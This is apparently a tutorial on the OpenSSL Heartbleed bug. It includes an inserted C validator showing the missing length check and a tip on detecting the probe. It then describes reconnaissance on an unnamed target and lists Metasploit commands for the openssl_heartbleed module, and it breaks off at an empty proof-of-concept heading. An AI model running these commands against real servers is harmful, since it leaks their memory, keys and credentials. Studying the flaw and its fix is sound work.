Heartbleed vulnerability and how to exploit it using Metasploit
Tools:
- shodan.io
- Linux
- Metasploit
Heartbleed:
Heartbleed is an OpenSSL vulnerability that allows an attacker to “bleed” out whatever is in memory on the server.
Discovered by Neel Mehta of Google Security and dated 07 Apr 2014, this vulnerability is tracked as CVE-2014-0160 and is known as the Heartbleed bug.
You can also dump the TLS/SSL certificate for the webpage. You can modify the exploit to continuously extract data 64 bytes at a time.
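To show where the bug actually lives, here is an added example (not code from the original post or from OpenSSL) of the bounds check that a heartbeat handler must perform on an incoming TLS heartbeat record (RFC 6520). The unpatched OpenSSL code trusted the 16-bit payload_length field in the message and copied that many bytes back to the peer from memory, regardless of how many bytes had really arrived; the fix was to reject any record whose declared payload plus the mandatory 16 bytes of padding does not fit inside the record. The function name hb_validate and the two sample records are constructed for this example.

```c
/* Added example (not from the original post): a validator for TLS heartbeat
 * records (RFC 6520) that applies the length check the Heartbleed fix added.
 * A record whose declared payload_length does not fit inside the bytes that
 * actually arrived is rejected instead of being echoed back from memory. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define HB_REQUEST     1    /* RFC 6520 HeartbeatMessageType heartbeat_request  */
#define HB_RESPONSE    2    /* RFC 6520 HeartbeatMessageType heartbeat_response */
#define HB_MIN_PADDING 16   /* RFC 6520: padding must be at least 16 bytes      */

typedef enum {
    HB_OK = 0,
    HB_TOO_SHORT,        /* not even a full header plus minimum padding */
    HB_BAD_TYPE,         /* unknown heartbeat message type */
    HB_LENGTH_OVERRUN    /* declared payload runs past the received record */
} hb_status;

/* Validate a heartbeat record of record_len bytes. On HB_OK, *payload_len
 * (if non-NULL) receives the declared payload length, which is then safe to
 * copy because it is known to lie inside the record. */
hb_status hb_validate(const uint8_t *rec, size_t record_len, uint16_t *payload_len)
{
    /* type (1) + payload_length (2) + minimum padding (16) */
    if (record_len < (size_t)1 + 2 + HB_MIN_PADDING)
        return HB_TOO_SHORT;
    if (rec[0] != HB_REQUEST && rec[0] != HB_RESPONSE)
        return HB_BAD_TYPE;

    /* payload_length is a 16-bit big-endian field right after the type byte */
    uint16_t plen = (uint16_t)((rec[1] << 8) | rec[2]);

    /* This is the check the vulnerable code lacked: the declared payload plus
     * the mandatory padding must fit inside the bytes actually received.
     * Without it, the responder copies plen bytes starting at the payload,
     * reading far beyond the end of the real message. */
    if ((size_t)1 + 2 + plen + HB_MIN_PADDING > record_len)
        return HB_LENGTH_OVERRUN;

    if (payload_len)
        *payload_len = plen;
    return HB_OK;
}

/* Constructed sample records (not captured traffic). */
static const uint8_t good_rec[] = {
    0x01, 0x00, 0x03, 'a', 'b', 'c',              /* request, 3-byte payload */
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 /* 16 bytes of padding     */
};                                                 /* total 22 bytes          */
static const uint8_t bad_rec[] = {
    0x01, 0xff, 0xff, 'a', 'b', 'c',              /* claims 65535 bytes, carries 3 */
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

hb_status check_good(void) { return hb_validate(good_rec, sizeof good_rec, NULL); }
hb_status check_bad(void)  { return hb_validate(bad_rec,  sizeof bad_rec,  NULL); }

/* Returns the parsed payload length of the well-formed record (3). */
uint16_t good_payload_len(void)
{
    uint16_t n = 0;
    hb_validate(good_rec, sizeof good_rec, &n);
    return n;
}

int main(void)
{
    printf("well-formed record: %s\n",
           check_good() == HB_OK ? "accepted" : "rejected");
    printf("malformed record:   %s\n",
           check_bad() == HB_LENGTH_OVERRUN ? "rejected (length overrun)" : "accepted");
    return 0;
}
```

The same comparison of declared length against received length is what a network sensor can apply to heartbeat records in flight: a request whose payload_length exceeds the record it sits in has no legitimate purpose and is a reliable signature of a Heartbleed probe.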
Reconnaissance:
After I had done some reconnaissance on a target using some well-known tools like Nmap, sublist3r, and censys, I found that the target may be vulnerable to the Heartbleed vulnerability.
I decided to search for the target IP on shodan.io, and it told me the same: the target website is using an old version of OpenSSL and might be vulnerable.
Exploitation:
Now I decided to check whether the target is vulnerable using the Metasploit module.
$ msfconsole
> use auxiliary/scanner/ssl/openssl_heartbleed
> set RHOSTS <IP>
> set RPORT <Port>
> check
> set VERBOSE true
> exploit
Proof of concept (PoC):
Metasploit: